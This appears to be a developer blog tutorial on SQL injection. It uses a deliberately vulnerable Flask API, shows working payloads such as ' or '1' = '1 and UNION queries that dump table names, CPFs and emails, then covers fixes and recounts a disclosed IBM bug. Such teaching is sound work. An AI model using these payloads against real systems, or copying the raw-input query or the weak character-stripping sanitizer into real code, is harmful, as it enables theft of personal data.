How SQL Injection attack works 💉🔓

gui commited 5 years ago

Have you ever wondered what is or how a SQL Injection attack works? How it takes place, how it is discovered, and whether it affects big companies?

Well, I'll start this commit by sharing with you a Flask API vulnerable to SQL Injection so you can see by yourself how the attack works, where the vulnerability hides within, and finally, we're going to explore the vulnerability together.

And of course, it couldn't be any different, I'll finish sharing a real case where I found a vulnerability inside an IBM system that granted me access to more than 25.000 social security numbers, phones, emails, and even IBM Cloud vouchers.

Don't worry if you're unfamiliar with Python, I'll make it easy, simple, and pleasant for you.

This commit will be split into 4 tags: practical, exploration, prevention, and finally IBM, so you can decide how to read it.

🏔 Set up

As always, let's focus on the problem, then on exploring the vulnerability, and finally on resolving it.

I'd like to invite you to either:

Use gitpod.io for simplicity and mindless setup (it's free, just requires a GitHub account), or
Clone the repository, and run it locally on your machine

Run on GitPod

Just click the button below and you should be all set 👇

NOTE: all endpoints mentioned in the examples below use localhost since gitpod generates a random address for every single user.

gitpod domain — Sample on random GitPod address

So, if yours is: https://my-random-subdomain.gitpod.io/, you can infer that every time that I show http://localhost:5000/whatever means you should instead use: https://my-random-subdomain.gitpod.io/whatever.

Run locally

I won't judge you if you like things old school 👇

Clone it, install dependencies, and run the flask API:

git clone https://github.com/guilatrova/flask-sqlinjection-vulnerable.git
cd flask-sqlinjection-vulnerable

# Recommended (Create virtualenv)
python3 -m virtualenv .venv
source .venv/bin/activate

# Install deps
pip install -r requirements.txt

# Start the server
python src/main.py

🪀 Play with the API

Nice, now you should have a heartwarming message saying "hi" and a fancy link.

Hit the link, and you will be redirected to /challenges/111.111.111-11 that should show you a list with random values:

1. Challenge A: scored 8
2. Challenge B: scored 4
3. Challenge C: scored 10
4. Challenge D: scored 10
5. Challenge E: scored 8

Oh, did you notice the pretty UI? I know, I know, my UX skills are outstanding, I might sell a course someday.

What is it that I'm looking at?

Rightttt... I need to explain the complex business rules behind it.

We're creating a system inspired by the real case from IBM (the whole story I'll tell more about at the end):

Users can query their submissions and check their grades by providing their id (in Brazil we name it CPF, analogous to social security number in the US)

Flow — System flow: Requests being sent, and the server responding

As simple as that. No authentication is needed, as long as you have an id (even from your friends) you can query to see progress. You can't modify or see anything else.

The endpoint is also simple: http://localhost:5000/challenges/111.111.111-11. And as you can imagine, replacing the final id with any other like 222.222.222-22 is enough

How this API works?

We're using Flask for the API, and SQLite for the database. For our goal (to explore the SQL Injection vulnerability) the simpler the better. Even though it's SQLite, the same concepts and ideas apply to something more robust like Postgres or MySQL.

I'll guide you towards some specific files, but only the relevant ones:

main.py is our entrypoint and it sets up some initial data (so you don't have to) and runs the Flask API:

from db_commands import start_database
from flask_app import app

if __name__ == "__main__":
    start_database()
    app.run()

db_commands.py is responsible for creating the tables, the outcome will be:

Database Structure — Database Tables: challenges and users table

It also inserts by default 3 users with a random number of assignments. The "CPFs" are 111.111.111-11, 222.222.222-22, and 333.333.333-33.

db.py is our data layer responsible for querying the database, note (for the sake of this exercise) we're not using any ORM:

DB_FILENAME = os.path.realpath("data/test.db")  # 👈 Where the SQLite database file will be generated


def _get_connection() -> sqlite3.Connection:
    ...

@contextlib.contextmanager
def connection_context():
    ...

def get_challenges_for_candidate(cpf: str) -> List[Any]:  # 👈 Returns the list of challenges submitted
    query = f"""
        SELECT title, score FROM challenges c
        JOIN users u
        ON u.id = c.user_id
        WHERE u.cpf='{cpf}';
    """
    ...

    with connection_context() as cur:
        cur.execute(query)
        results = cur.fetchall()

        return results

Finally, all endpoints are kept in flask_app.py.

And if you visited the first URL (http://localhost:5000/challenges/111.111.111-11) and it worked, then we're good to go!

🧠 Inside the programmer's head

Let's try to get inside the programmer's head to understand his goal, and finally play with the API a bit.

I mean, it's quite simple, right?

Let's try to check the grades of all available users:

You should see different lists with different scores for each challenge. That's expected.

From the feature perspective, this project is done and works.

🤡 Inside the user's head

Users are creative, and they have the power to frustrate any developer.

Well, that's our time to shine, we're going to play the user now. Let's screw this system.

Let's start by inserting an id that doesn't exists at all, visit:

http://localhost:5000/challenges/anything

And sadly it works... 😤 Let's not give up.

What do you think would happen if we inserted some 💉 SQL in there? Let's try this one, and don't worry if it doesn't make sense yet:

First SQL Injection — SQL Injection Snippet: 1' or '1' = '1

So, go ahead and visit the following URL:

http://localhost:5000/challenges/' or '1' = '1

🤯 It worked, but why? how?

Yes, it worked, but note how many challenges it returned. I assure you it's way more than it should. Actually, it's all rows from the table.

It might make more sense to you if you open your terminal and check:

--------------------------------------------------
Passing input: ' or '1' = '1
--------------------------------------------------
Executing query:
        SELECT title, score FROM challenges c
        JOIN users u
        ON u.id = c.user_id
        WHERE u.cpf='' or '1' = '1';

--------------------------------------------------
127.0.0.1 - - [30/Sep/2021 07:47:34] "GET /challenges/'%20or%20'1'%20=%20'1 HTTP/1.1" 200 -

The programmer made a mistake, he never realized that someone could and would insert a SQL statement instead of an ID!

As you could have figured out, the trick is the WHERE clause:

WHERE u.cpf='' or '1' = '1'

We created a condition that will ALWAYS return true for every single row, so the database returns everything available in that table.

Just consider:

For every row the database compares either:

Is CPF "" (empty)? It's always false, considering the column is required and non-nullable,
Is 1 = 1? As stupid as it might sound... It's always true, and combined with the or clause the database returns every single row as a result!!

Why the hell this SQL got executed?

Let's analyze the "flow" first. Everything starts from our view, receiving the user input:

@app.route("/challenges/<cpf>")  # 👈 We create a route expecting a param
def get_challenges(cpf: str):   # 👈 Receive the param as an arg
    ...
    challenges = get_challenges_for_candidate(cpf)  # 👈 Pass it straight away to data layer
    ...

And then how our data layer builds the query:

def get_challenges_for_candidate(cpf: str) -> List[Any]:  # 👈 Receive the input
    query = f"""
        SELECT title, score FROM challenges c
        JOIN users u
        ON u.id = c.user_id
        WHERE u.cpf='{cpf}';  -- 👈 We just append the raw input here
    """

That's the problem, the developer didn't sanitize the input, he trusted its users (poor guy).

By inserting our magical incompleted SQL: ' or '1' = '1 we match and "complete" his clause.

🧭 Exploring SQL Injection

Given that now we found the API is vulnerable to SQL Injection, let's analyze all the queries we can do to explore it.

⏸️ Pause for a Tip

We're about to run more complex (and longer) queries. Although not required, it might help to use some better client tool, I'm using the ThunderClient straight from my VSCode, and if you decided to follow me on gitpod.io you should have this extension available out-of-the-box:

Feel free to either: use it, keep the browser, or even use Postman - whatever works for you!

🔐 It's not that dangerous, you only have access to public data

You're right. Let's fix that?

As you could see, we just modified the where clause to include more rows... Let's modify the table being used from the client side 🔥.

Try this first, and later we discuss what it does:

' or '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%

Right now I'm going to visit: http://localhost:5000/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%25. ("%25" is literal "%" (percent))

Broken server — What happens to servers when they throw 500

Dude, we just broke the API! No user should ever have the power of crashing a server.

But still, we didn't receive any data, let's make small modifications, adjust your URL to use this:

' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%

Which mens this URL: http://localhost:5000/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%25

You're going to receive something like this:

1. table_name: scored challenges
2. table_name: scored users

Note we were able to replace both challenge and score data. It worked! Looking at the console helps understanding why:

Executing query:
    SELECT title, score FROM challenges c
    JOIN users u
    ON u.id = c.user_id
    WHERE u.cpf='' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%';

Let's break it down:

WHERE u.cpf='' AND '1' = '2' is an impossible query, so it returns 0 rows
- Note we don't need the '1' = '2' condition here, but you never know what's in the database, so I prefer to exclude it for good
UNION allows us to combine another query to the final result
SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'
- I had to add a static 'table_name' to ensure the server doesn't crash since it expects 2 columns to be returned
- This query returns the list of all tables existing in the database! (So we know how to proceed)
- We filter only relevant table results, excluding all SQLite inner details

Now let me challenge you!

Is it possible for you to return all CPFs and emails from the database? Try it yourself!

Here's the same database structure from before to help:

Well, I hope you nailed it!

Visiting: http://localhost:5000/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- returned a list with both the CPF and the email:

1. 111.111.111-11: scored any@email.com
2. 222.222.222-22: scored another@email.com
3. 333.333.333-33: scored yetanother@email.com

You can go ahead and tweak the columns and the SQL statements, but hopefully, you understand that: The vulnerability is pretty serious and can produce great damage.

🛡️ How to prevent SQL Injection

So far you should have understood how such attacks happen and how a bad actor can explore it, but then, how to prevent it?

The first most obvious answer is to use an ORM (SQLModel, SQLAlchemy, or Django), but that would be too easy.

Let's consider a scenario where (like IBM) you can't use an ORM because you're just querying data from another database (and not creating it).

🧻 Sanitize user input

It just takes us to clear ' (I also recommend removing --, %, ;, @) to get rid of our issue, and that's such an easy fix!!!

Let's do it together, just go to flask_app.py, and do as follows:

def sanitize_input(raw: str) -> str:
    CLEAR = ""
    return raw.replace("'", CLEAR).replace("--", CLEAR).replace(";", CLEAR)


@app.route("/desafios/<cpf>")
def get_challenges(cpf: str):
    cpf = sanitize_input(cpf)
    challenges = get_challenges_for_candidate(cpf)
    ...

Go ahead and try any other tricks. It took only 3 lines and the whole fun is over!

🎚 Parametrize user input

EDIT: (2021/Oct/02) This improvement was suggested by my new friend Andy Hawkins.

Even though the above sanitization worked, we can do better. We can let the database deal with the parameters! After all, by manually sanitizing we risk ourselves missing some other character that may still cause a SQL Injection vulnerability.

This time we're modifying the db.py (feel free to undo the previous changes, they won't matter anymore). Do as follows:

def get_challenges_for_candidate(cpf: str) -> List[Any]:
    query = """
        SELECT title, score FROM challenges c
        JOIN users u
        ON u.id = c.user_id
        WHERE u.cpf=?;  -- 👈 Set the expected value as a parameter
    """
    ...

    with connection_context() as cur:
        cur.execute(query, (cpf,))  # 👈 Pass the raw input as a parameter
        ...

🔧 Use security linters

Besides input sanitization, you can also implement some linters to help. Let's try to install Bandit and see what it tells us.

# Install linter
❯ pip install bandit

# Scan with bandit
❯ bandit src -r

and then we get a report containing:

>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector through string-based query construction.
   Severity: Medium   Confidence: Low
   Location: src/db.py:37
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b608_hardcoded_sql_expressions.html
36      def get_challenges_for_candidate(cpf: str) -> List[Any]:
37          query = f"""
38              SELECT title, score FROM challenges c
39              JOIN users u
40              ON u.id = c.user_id
41              WHERE u.cpf='{cpf}';
42          """

That's very meaningful! It's pointing out specific places where we might be vulnerable to SQL Injection attacks (and that we were indeed)!

🏢 Real case: IBM

As always, I rather share real cases than fictional examples, so I'm sharing an experience I had with IBM.

IBM every year (since 2019) throws a fun marathon named "Behind The Code". Long story short, I participated in the 2019 edition, and back in that time it was impossible to know the challenges you have submitted, so they created a "simple" (👀) system to query challenge results:

IBM System to query challenges, clearly not as pretty as mine

It started with curiosity, I decided to open the network tab to see what request was being emitted... And that's the thing, you can never imagine what your users are going to do.

I found this:

So you can imagine the request being made as:

Server receiving CPF — Server sending CPF to Server

As soon as I tried the tricks you saw on the second tag (sending SQL commands instead of the expected value) and got an error! I could imply my SQL commands were being executed.

The server was taking my raw input and sending it straight to the database. That's a clear SQL Injection vulnerability!!

As I played with more commands, I found out that:

The stack trace was being exposed with the 500 status code;
They were using a PostgreSQL database;

There's even a funny case where the server respectfully corrected me sharing the real column name 😂

*(🇺🇸 `data nascimento` means `date of birth`, and `usuario` means `user`)*

I could even query my own personal data since I was a participant 😅.

Actually, it contained data from exactly 25.475 participants.

I appreciate the fact that as soon as I notified them, they fixed the issue quickly, then it was impossible to query anything else:

Fixed result — Vulnerability fixed after the report

👋 Hey, I hope you enjoyed reading about SQL Injection! How do you feel about bringing programming experiences to real life? They create relevant experiences that schools can't teach you.

Well, if you are part of the antifragile team that enjoys learning things applied to real life, I bet you're going to love what I'm preparing next.

I'm going to create a whole microservice architecture in public. I'll share every single decision, all the code will be open-source, and you will be able to fork it, modify it, and hopefully, learn from it!

Yes, this is going to be my new series, and you will even be able to participate or just criticize my decisions. Totally free.

If you're into microservices follow me for recurrent and bite-sized updates on the project and ensure to subscribe to never miss a post!